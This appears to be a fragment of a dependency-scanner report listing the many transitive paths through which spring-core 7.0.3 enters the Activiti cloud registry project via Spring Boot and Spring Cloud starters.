  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-actuator@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jetty-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-jackson@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-servlet@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jetty-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jetty-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jetty-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-health@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-freemarker@4.0.2 org.springframework.boot:spring-boot-freemarker@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 org.springframework.boot:spring-boot-jackson2@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.boot:spring-boot-starter-cache@4.0.2 org.springframework.boot:spring-boot-cache@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-freemarker@4.0.2 org.springframework.boot:spring-boot-freemarker@4.0.2 org.springframework:spring-context-support@7.0.3 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.boot:spring-boot-starter-cache@4.0.2 org.springframework.boot:spring-boot-cache@4.0.2 org.springframework:spring-context-support@7.0.3 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-servlet@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-health@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-freemarker@4.0.2 org.springframework.boot:spring-boot-freemarker@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 org.springframework.boot:spring-boot-jackson2@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
